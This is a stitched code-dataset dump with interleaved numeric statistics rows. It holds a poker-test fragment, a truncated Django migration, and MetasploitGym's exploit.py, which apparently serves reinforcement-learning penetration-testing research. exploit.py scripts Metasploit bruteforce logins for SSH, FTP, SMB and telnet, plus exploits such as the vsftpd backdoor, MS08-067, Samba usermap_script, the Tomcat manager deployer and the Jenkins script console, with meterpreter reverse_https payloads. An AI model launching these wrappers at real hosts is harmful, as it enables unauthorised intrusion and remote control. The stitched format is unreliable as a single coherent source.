        equilibrium_exploitability = exploitability.evaluate(kuhn_equilibrium)
        raise_add_tilted_exploitability = exploitability.evaluate(tilted_agent_strategy)
        self.assertTrue(raise_add_tilted_exploitability > equilibrium_exploitability)
| 38.681319
| 120
| 0.715909
| 404
| 3,520
| 5.772277
| 0.163366
| 0.083619
| 0.061321
| 0.080189
| 0.826329
| 0.812607
| 0.764151
| 0.764151
| 0.742281
| 0.742281
| 0
| 0.007704
| 0.225568
| 3,520
| 90
| 121
| 39.111111
| 0.847762
| 0
| 0
| 0.716216
| 0
| 0
| 0.039489
| 0.039489
| 0
| 0
| 0
| 0
| 0.121622
| 1
| 0.067568
| false
| 0
| 0.094595
| 0
| 0.175676
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cc678dfef8cb0874fecfe2385fa62869906f077
| 14,652
|
py
|
Python
|
metasploit_gym/action/exploit.py
|
phreakAI/MetasploitGym
|
128b977ccebbbb026784cba0ecd82182fdfb0cdb
|
[
"MIT"
] | 6
|
2021-10-01T20:05:24.000Z
|
2022-03-24T20:14:41.000Z
|
metasploit_gym/action/exploit.py
|
phreakAI/MetasploitGym
|
128b977ccebbbb026784cba0ecd82182fdfb0cdb
|
[
"MIT"
] | 1
|
2021-12-13T09:24:56.000Z
|
2022-03-27T02:08:14.000Z
|
metasploit_gym/action/exploit.py
|
phreakAI/MetasploitGym
|
128b977ccebbbb026784cba0ecd82182fdfb0cdb
|
[
"MIT"
] | null | null | null |
"""Exploits currently supported
Straightforward to add more following the basic model presented here
"""
from .action import Exploit
import time
def wait_for_job_completion(job_info, client):
    """Block until the metasploit job described by ``job_info`` finishes.

    Returns immediately when ``job_info`` is ``None`` or already reports an
    error; likewise when a poll result reports an error.

    :param job_info: dict returned by ``module.execute()`` (carries "uuid"),
        possibly ``None`` or containing an "error" key
    :param client: metasploit RPC client exposing ``client.jobs.info_by_uuid``
    :return: None
    """
    if job_info is None:
        return
    if "error" in job_info:
        return
    # The UUID never changes; look it up once instead of on every poll
    # (the original re-read job_info["uuid"] each loop iteration).
    job_id = job_info["uuid"]
    while True:
        results = client.jobs.info_by_uuid(job_id)
        if "error" in results:
            return
        if results["status"] == "completed":
            return
        # Still running — poll again after a short delay.
        time.sleep(1)
class SSH_Bruteforce(Exploit):
    """Bruteforce login attempts against SSH (port 22).

    Wraps metasploit's ``auxiliary/scanner/ssh/ssh_login`` module:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_login.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "SSH_Bruteforce"
        self.target = target
        self.service = "ssh"
        # A login scanner has no access/OS/version prerequisites.
        self.req_access = None
        self.req_os = None
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ in the
        # MRO — presumably intentional; worth confirming.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=22):
        """Launch the ssh_login scanner against host:port and wait for it.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: default port 22
        :return: None
        """
        module = client.modules.use("auxiliary", "scanner/ssh/ssh_login")
        module["RHOSTS"] = host
        module["RPORT"] = port
        # TODO: detect the wordlist path via the metasploit rpc server
        module["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
        job = module.execute()
        wait_for_job_completion(job, client)
class FTP_Bruteforce(Exploit):
    """Bruteforce login attempts against FTP (port 21).

    Wraps metasploit's ``auxiliary/scanner/ftp/ftp_login`` module:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/ftp_login.rb

    Bug fix: the original documented and defaulted to port 23, which is
    telnet's port (copy-paste); FTP control runs on 21, matching the
    metasploit module's own RPORT default.
    """

    def __init__(self, target=(0, 0)):
        self.name = "FTP_Bruteforce"
        self.service = "ftp"
        self.target = target
        # A login scanner has no access/OS/version prerequisites.
        self.req_access = None
        self.req_os = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=21):
        """Launch the ftp_login scanner against host:port and wait for it.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: default port 21 (FTP control port; was 23)
        :return: None
        """
        exploit = client.modules.use("auxiliary", "scanner/ftp/ftp_login")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        # TODO: This should be detected based on metasploit rpc server
        exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
        job_info = exploit.execute()
        wait_for_job_completion(job_info, client)
class SMB_Bruteforce(Exploit):
    """Bruteforce login attempts against SMB / Microsoft-DS (port 445).

    Wraps metasploit's ``auxiliary/scanner/smb/smb_login`` module:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_login.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "SMB_Bruteforce"
        self.target = target
        self.service = "Microsoft-DS"
        # A login scanner has no access/OS/version prerequisites.
        self.req_access = None
        self.req_os = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=445):
        """Launch the smb_login scanner against host:port and wait for it.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: default port 445
        :return: None
        """
        module = client.modules.use("auxiliary", "scanner/smb/smb_login")
        module["RHOSTS"] = host
        module["RPORT"] = port
        # TODO: detect the wordlist path via the metasploit rpc server
        module["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
        job = module.execute()
        wait_for_job_completion(job, client)
class Telnet_Bruteforce(Exploit):
    """Bruteforce login attempts against telnet (port 23).

    Wraps metasploit's ``auxiliary/scanner/telnet/telnet_login`` module:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/telnet/telnet_login.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "Telnet_Bruteforce"
        self.service = "telnet"
        self.target = target
        # A login scanner has no access/OS/version prerequisites.
        self.req_access = None
        self.req_os = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=23):
        """Launch the telnet_login scanner against host:port and wait for it.

        Bug fix: the default port was 445 (copy-pasted from the SMB class)
        and contradicted this class's own "port 23" docstring; telnet_login
        defaults to 23.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: default port 23 (telnet; was 445)
        :return: None
        """
        exploit = client.modules.use("auxiliary", "scanner/telnet/telnet_login")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        # TODO: This should be detected based on metasploit rpc server
        exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
        job_info = exploit.execute()
        wait_for_job_completion(job_info, client)
class VSFTPD(Exploit):
    """Backdoor command execution in vsftpd 2.3.4 (FTP, port 21).

    Wraps ``exploit/unix/ftp/vsftpd_234_backdoor``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "VSFTPD"
        self.target = target
        self.service = "ftp"
        self.req_os = "unix"
        self.req_access = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=21):
        """Run the vsftpd backdoor exploit against host:port and wait for it.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: default port 21
        :return: None
        """
        module = client.modules.use("exploit", "unix/ftp/vsftpd_234_backdoor")
        module["RHOSTS"] = host
        module["RPORT"] = port
        job = module.execute(payload="cmd/unix/interact")
        wait_for_job_completion(job, client)
class JavaRMIServer(Exploit):
    """Remote code execution via the Java RMI server's default configuration.

    Wraps ``exploit/multi/misc/java_rmi_server``:
    https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/multi/misc/java_rmi_server.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "Java_RMI_Server"
        self.service = "http"
        self.target = target
        self.req_access = None
        self.req_os = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=1099):
        """Run the java_rmi_server exploit against host:port and wait for it.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: default port 1099 (RMI registry)
        :return: None
        """
        exploit = client.modules.use("exploit", "multi/misc/java_rmi_server")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        # Consistency fix: every other exploit class in this module captures
        # the launched job and blocks until it finishes; the original fired
        # and forgot here, discarding the job handle.
        job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
class Ms08_067_Netapi(Exploit):
    """MS08-067: SMB code execution via a crafted RPC packet; works great on
    Windows XP.

    Wraps ``exploit/windows/smb/ms08_067_netapi``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms08_067_netapi.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "ms08_067_netapi"
        self.target = target
        self.service = "Microsoft-DS"
        self.req_os = "win"
        self.req_access = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=445):
        """Run ms08_067_netapi against host:port and wait for the job.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: default port 445 (Microsoft-DS)
        :return: None
        """
        module = client.modules.use("exploit", "windows/smb/ms08_067_netapi")
        module["RHOSTS"] = host
        module["RPORT"] = port
        job = module.execute(cmd="windows/meterpreter/reverse_https")
        wait_for_job_completion(job, client)
class ManageEngine_Auth_Upload(Exploit):
    """Authenticated HTTP upload leading to remote code execution on
    ManageEngine ServiceDesk.

    Wraps ``exploit/multi/http/manageengine_auth_upload``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/manageengine_auth_upload.rb

    TODO: Find a vulnerable copy of this for building environments. oy vey.
    """

    def __init__(self, target=(0, 0)):
        self.name = "ManageEngine_Auth_Upload"
        self.target = target
        self.service = "http"
        self.req_access = None
        self.req_os = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=8080):
        """Run manageengine_auth_upload against host:port and wait for it.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: default port 8080
        :return: None
        """
        module = client.modules.use("exploit", "multi/http/manageengine_auth_upload")
        module["RHOSTS"] = host
        module["RPORT"] = port
        job = module.execute(cmd="java/meterpreter/reverse_https")
        wait_for_job_completion(job, client)
class ApacheJamesExecution(Exploit):
    """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/smtp/apache_james_exec.rb

    'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write"
    """

    def __init__(self, target=(0, 0)):
        self.name = "Apache_James_InsecureUserCreation"
        # Bug fix: service was misspelled "smpt" and would never match an
        # "smtp" service fingerprint.
        self.service = "smtp"
        self.target = target
        self.req_access = None
        self.req_os = "linux"
        self.req_version = None
        # Bug fix: super(Exploit, self) skipped Exploit.__init__ and passed the
        # arguments to object.__init__ (TypeError on Python 3).
        super(ApacheJamesExecution, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=25):
        """Run the Apache James SMTP exploit and wait for the job.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: target SMTP port (default 25; the previous default of
            8080 was left over from a copy-paste of the ManageEngine class)
        :return: None
        """
        # Bug fix: this method previously targeted
        # "multi/http/manageengine_auth_upload" — a copy-paste from the class
        # above — instead of the Apache James module named in the docstring.
        exploit = client.modules.use("exploit", "linux/smtp/apache_james_exec")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        # NOTE(review): a Java meterpreter payload is unusual for this
        # command-execution module; confirm against the module's compatible
        # payload list before relying on it.
        job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
class SambaUsermapScript(Exploit):
    """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/samba/usermap_script.rb

    'Name' => "Samba "username map script" Command Execution"
    """

    def __init__(self, target=(0, 0)):
        self.name = "Samba_Usermap_Script"
        self.target = target
        self.service = "NetBIOS-SSN"
        self.req_access = None
        self.req_os = "multi"
        self.req_version = None
        # Bug fix: super(Exploit, self) skipped Exploit.__init__ and passed the
        # arguments to object.__init__ (TypeError on Python 3).
        super(SambaUsermapScript, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=139):
        """Run the module and block until the metasploit job completes.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: target NetBIOS session port (default 139)
        :return: None
        """
        exploit = client.modules.use("exploit", "multi/samba/usermap_script")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        # NOTE(review): usermap_script is a command-execution exploit; confirm
        # the Java payload is actually compatible with this module.
        job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
class ApacheTomcatAuthenticationCodeExecution(Exploit):
    """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_mgr_deploy.rb

    'Name' => "Apache Tomcat Manager Application Deployer Authenticated Code Execution"
    """

    def __init__(self, target=(0, 0)):
        self.name = "Apache_Tomcat_Execution"
        self.target = target
        self.service = "http"
        self.req_access = None
        self.req_os = "multi"
        self.req_version = None
        # Bug fix: super(Exploit, self) skipped Exploit.__init__ and passed the
        # arguments to object.__init__ (TypeError on Python 3).
        super(ApacheTomcatAuthenticationCodeExecution, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=8080):
        """Run the module and block until the metasploit job completes.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: Tomcat manager HTTP port (default 8080; the old
            docstring incorrectly said None)
        :return: None
        """
        exploit = client.modules.use("exploit", "multi/http/tomcat_mgr_deploy")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
class Jenkins_CI_Script_Java_Execution(Exploit):
    """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_script_console.rb

    'Name' => "Jenkins-CI Script-Console Java Execution"
    """

    def __init__(self, target=(0, 0)):
        self.name = "Jenkins_CI_Script_Console_Java_Execution"
        self.service = "http"
        self.target = target
        self.req_access = None
        self.req_os = "multi"
        self.req_version = None
        # Bug fix: super(Exploit, self) skipped Exploit.__init__ and passed the
        # arguments to object.__init__ (TypeError on Python 3).
        super(Jenkins_CI_Script_Java_Execution, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=8080):
        """Run the module and block until the metasploit job completes.

        :param client: metasploit client object
        :param host: string representing IP of the target
        :param port: Jenkins HTTP port (default 8080)
        :return: None
        """
        exploit = client.modules.use("exploit", "multi/http/jenkins_script_console")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
| 34.556604
| 143
| 0.628651
| 1,731
| 14,652
| 5.134027
| 0.116118
| 0.056712
| 0.035107
| 0.047035
| 0.843142
| 0.807697
| 0.807697
| 0.761899
| 0.747496
| 0.74322
| 0
| 0.015974
| 0.260852
| 14,652
| 423
| 144
| 34.638298
| 0.804617
| 0.293612
| 0
| 0.669604
| 0
| 0
| 0.144792
| 0.088723
| 0
| 0
| 0
| 0.01182
| 0
| 1
| 0.110132
| false
| 0.017621
| 0.008811
| 0
| 0.180617
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2e33b457fd2b88a3ff24791b4d153005a095c56
| 24,503
|
py
|
Python
|
core/migrations/0001_initial.py
|
bpotvin-bccrc/colossus
|
fa5ca7ce4cfe794c7d2167acb868aa9167988941
|
[
"MIT"
] | 2
|
2018-10-03T16:05:14.000Z
|
2019-03-08T23:01:29.000Z
|
core/migrations/0001_initial.py
|
bpotvin-bccrc/colossus
|
fa5ca7ce4cfe794c7d2167acb868aa9167988941
|
[
"MIT"
] | 3
|
2019-05-09T22:48:22.000Z
|
2020-06-05T18:52:05.000Z
|
core/migrations/0001_initial.py
|
bpotvin-bccrc/colossus
|
fa5ca7ce4cfe794c7d2167acb868aa9167988941
|
[
"MIT"
] | 4
|
2018-08-16T22:25:10.000Z
|
2021-02-19T16:10:15.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2019-07-12 18:40
from __future__ import unicode_literals
import core.helpers
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
    """Initial schema for the ``core`` app (generated by Django 1.11.17).

    Creates the sample / chip-region / sublibrary models plus their
    ``simple_history`` shadow tables (the ``Historical*`` models, which
    mirror the live models and add ``history_*`` bookkeeping columns).
    """

    initial = True

    dependencies = [
    ]

    operations = [
        # Clinical/pathology annotations attached to a sample.
        migrations.CreateModel(
            name='AdditionalSampleInformation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tissue_state', models.CharField(blank=True, choices=[('NONE', 'None'), ('FROZ', 'Frozen'), ('FRES', 'Fresh'), ('DIG-FRES', 'Digested-Fresh')], default='NONE', max_length=50, null=True, verbose_name='Tissue State')),
                ('cancer_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Type')),
                ('cancer_subtype', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Subtype')),
                ('disease_condition_health_status', models.CharField(blank=True, max_length=50, null=True, verbose_name='Disease condition/health status')),
                ('sex', models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Mixed'), ('U', 'Unknown')], max_length=50, null=True, verbose_name='Sex')),
                ('patient_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Patient biopsy date')),
                ('anatomic_site', models.CharField(max_length=50, null=True, verbose_name='Anatomic site')),
                ('anatomic_sub_site', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anatomic sub-site')),
                ('developmental_stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Developmental stage')),
                ('tissue_type', models.CharField(choices=[('N', 'Normal'), ('B', 'Benign'), ('PM', 'Pre-malignant'), ('M', 'Malignant'), ('NNP', 'Non-neoplastic Disease'), ('U', 'Undetermined'), ('HP', 'Hyperplasia'), ('MP', 'Metaplasia'), ('DP', 'Dysplasia')], max_length=50, null=True, verbose_name='Tissue type')),
                ('cell_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell type')),
                ('pathology_disease_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Pathology/disease name (for diseased samples only)')),
                ('additional_pathology_info', models.CharField(blank=True, max_length=50, null=True, verbose_name='Additional pathology information')),
                ('grade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Grade')),
                ('stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Stage')),
                ('tumour_content', models.CharField(blank=True, max_length=50, null=True, verbose_name='Tumor content (%)')),
                ('pathology_occurrence', models.CharField(blank=True, choices=[('PR', 'Primary'), ('RC', 'Recurrent or Relapse'), ('ME', 'Metastatic'), ('RM', 'Remission'), ('UN', 'Undetermined'), ('US', 'Unspecified')], max_length=50, null=True, verbose_name='Pathology occurrence')),
                ('treatment_status', models.CharField(blank=True, choices=[('PR', 'Pre-treatment'), ('IN', 'In-treatment'), ('PO', 'Post-treatment'), ('NA', 'N/A'), ('UN', 'Unknown')], max_length=50, null=True, verbose_name='Treatment status')),
                ('family_information', models.CharField(blank=True, max_length=50, null=True, verbose_name='Family information')),
            ],
            # FieldValue is a project mixin added alongside models.Model.
            bases=(models.Model, core.helpers.FieldValue),
        ),
        # A region of a DLP chip.
        migrations.CreateModel(
            name='ChipRegion',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('region_code', models.CharField(blank=True, max_length=50, null=True, verbose_name='region_code')),
            ],
            bases=(models.Model, core.helpers.FieldValue),
        ),
        # Key/value-style metadata attached to a chip region.
        migrations.CreateModel(
            name='ChipRegionMetadata',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('metadata_value', models.CharField(blank=True, max_length=50, null=True, verbose_name='Metadata value')),
            ],
            bases=(models.Model, core.helpers.FieldValue),
        ),
        # simple_history shadow table for AdditionalSampleInformation.
        migrations.CreateModel(
            name='HistoricalAdditionalSampleInformation',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('tissue_state', models.CharField(blank=True, choices=[('NONE', 'None'), ('FROZ', 'Frozen'), ('FRES', 'Fresh'), ('DIG-FRES', 'Digested-Fresh')], default='NONE', max_length=50, null=True, verbose_name='Tissue State')),
                ('cancer_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Type')),
                ('cancer_subtype', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Subtype')),
                ('disease_condition_health_status', models.CharField(blank=True, max_length=50, null=True, verbose_name='Disease condition/health status')),
                ('sex', models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Mixed'), ('U', 'Unknown')], max_length=50, null=True, verbose_name='Sex')),
                ('patient_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Patient biopsy date')),
                ('anatomic_site', models.CharField(max_length=50, null=True, verbose_name='Anatomic site')),
                ('anatomic_sub_site', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anatomic sub-site')),
                ('developmental_stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Developmental stage')),
                ('tissue_type', models.CharField(choices=[('N', 'Normal'), ('B', 'Benign'), ('PM', 'Pre-malignant'), ('M', 'Malignant'), ('NNP', 'Non-neoplastic Disease'), ('U', 'Undetermined'), ('HP', 'Hyperplasia'), ('MP', 'Metaplasia'), ('DP', 'Dysplasia')], max_length=50, null=True, verbose_name='Tissue type')),
                ('cell_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell type')),
                ('pathology_disease_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Pathology/disease name (for diseased samples only)')),
                ('additional_pathology_info', models.CharField(blank=True, max_length=50, null=True, verbose_name='Additional pathology information')),
                ('grade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Grade')),
                ('stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Stage')),
                ('tumour_content', models.CharField(blank=True, max_length=50, null=True, verbose_name='Tumor content (%)')),
                ('pathology_occurrence', models.CharField(blank=True, choices=[('PR', 'Primary'), ('RC', 'Recurrent or Relapse'), ('ME', 'Metastatic'), ('RM', 'Remission'), ('UN', 'Undetermined'), ('US', 'Unspecified')], max_length=50, null=True, verbose_name='Pathology occurrence')),
                ('treatment_status', models.CharField(blank=True, choices=[('PR', 'Pre-treatment'), ('IN', 'In-treatment'), ('PO', 'Post-treatment'), ('NA', 'N/A'), ('UN', 'Unknown')], max_length=50, null=True, verbose_name='Treatment status')),
                ('family_information', models.CharField(blank=True, max_length=50, null=True, verbose_name='Family information')),
                # history_* columns are simple_history bookkeeping fields.
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
            ],
            options={
                'verbose_name': 'historical additional sample information',
                'db_table': 'additional_sample_information_history',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # simple_history shadow table for ChipRegion.
        migrations.CreateModel(
            name='HistoricalChipRegion',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('region_code', models.CharField(blank=True, max_length=50, null=True, verbose_name='region_code')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
            ],
            options={
                'verbose_name': 'historical chip region',
                'db_table': 'chip_region_history',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # simple_history shadow table for ChipRegionMetadata.
        migrations.CreateModel(
            name='HistoricalChipRegionMetadata',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('metadata_value', models.CharField(blank=True, max_length=50, null=True, verbose_name='Metadata value')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
            ],
            options={
                'verbose_name': 'historical chip region metadata',
                'db_table': 'chip_region_metadata_history',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # simple_history shadow table for JiraUser.
        migrations.CreateModel(
            name='HistoricalJiraUser',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('username', models.CharField(max_length=150)),
                ('name', models.CharField(max_length=150)),
                ('associated_with_dlp', models.BooleanField(default=True)),
                ('associated_with_tenx', models.BooleanField(default=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
            ],
            options={
                'verbose_name': 'historical jira user',
                'db_table': 'jira_user_history',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # simple_history shadow table for MetadataField.
        migrations.CreateModel(
            name='HistoricalMetadataField',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('field', models.CharField(max_length=50, verbose_name='Metadata key')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
            ],
            options={
                'verbose_name': 'historical metadata field',
                'db_table': 'metadata_history',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # simple_history shadow table for Sample.
        migrations.CreateModel(
            name='HistoricalSample',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('sample_id', models.CharField(max_length=50, null=True, verbose_name='Sample ID')),
                ('taxonomy_id', models.CharField(blank=True, default='9606', max_length=50, null=True, verbose_name='Taxonomy ID')),
                ('sample_type', models.CharField(blank=True, choices=[('P', 'Patient'), ('C', 'Cell Line'), ('X', 'Xenograft'), ('Or', 'Organoid'), ('O', 'Other')], max_length=50, null=True, verbose_name='Sample type')),
                ('anonymous_patient_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anonymous patient ID')),
                ('cell_line_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell line ID')),
                ('xenograft_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Xenograft ID')),
                ('xenograft_recipient_taxonomy_id', models.CharField(blank=True, default='10090', max_length=50, null=True, verbose_name='Xenograft recipient taxonomy ID')),
                ('xenograft_treatment_status', models.CharField(blank=True, default='', max_length=50, verbose_name='Xenograft treatment status')),
                ('strain', models.CharField(blank=True, max_length=50, null=True, verbose_name='Strain')),
                ('xenograft_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Xenograft biopsy date')),
                ('notes', models.TextField(blank=True, max_length=5000, null=True, verbose_name='Notes')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
            ],
            options={
                'verbose_name': 'historical sample',
                # NOTE: table name is 'history_sample', unlike the other
                # history tables which use the '<name>_history' pattern.
                'db_table': 'history_sample',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # simple_history shadow table for SublibraryInformation.
        migrations.CreateModel(
            name='HistoricalSublibraryInformation',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('sample', models.CharField(blank=True, max_length=50, null=True, verbose_name='Sample')),
                ('row', models.IntegerField(blank=True, null=True, verbose_name='Row')),
